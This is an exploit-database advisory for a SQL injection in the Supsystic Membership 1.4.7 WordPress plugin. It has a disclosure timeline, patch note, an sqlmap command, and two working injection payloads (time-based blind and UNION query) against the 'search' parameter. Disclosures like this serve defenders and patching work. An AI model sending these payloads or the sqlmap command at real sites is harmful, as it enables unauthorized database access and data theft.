WordPress Plugin Supsystic Membership 1.4.7 - 'sidx' SQL injection

vendor:

Membership

by:

Erik David Martin

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Membership

Affected Version From: 1.4.7

Affected Version To: 1.4.7

Patch Exists: Yes

Related CWE: N/A

CPE: a:supsystic:membership:1.4.7

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Ubuntu 16.04.6 LTS / WordPress 5.4.2

2020

WordPress Plugin Supsystic Membership 1.4.7 – ‘sidx’ SQL injection

The GET parameters 'search' and 'sidx' does not sanitize user input when searching for badges. An attacker can use ZAP/Burp to capture the web request when searching for data and save it to request.txt. Then, they can use sqlmap to exploit the vulnerability.

Mitigation:

The vendor has released a patch to fix this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Supsystic Membership 1.4.7 - 'sidx' SQL injection
# Date: 09/08/2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/membership-by-supsystic.1.4.7.zip
# Version: 1.4.7
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2



# 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply
# 29/11 2020: WordPress Plugin Security team contacted
# 22/12 2020: Vulnerability fixed


# 1. Description

The GET parameters "search" and "sidx" does not sanitize user input when searching for badges.


# 2. Proof of Concept (PoC)

Use ZAP/Burp to capture the web request when searching for data and save it to request.txt
Referer: http://192.168.0.63/wp-admin/admin.php?page=supsystic-membership&module=badges&action=index

sqlmap -r request.txt --dbms=mysql -p search

Parameter: search (GET)
	Type: time-based blind
	Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s' AND (SELECT 8958 FROM (SELECT(SLEEP(5)))oBIL) AND 'trjK'='trjK&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc

	Type: UNION query
	Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s' UNION ALL SELECT NULL,CONCAT(0x71786a6b71,0x6569796370704c625352574e6e424874456a74457847635473525a466d47576f775a46446b4e7055,0x716a7a6a71),NULL,NULL-- -&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc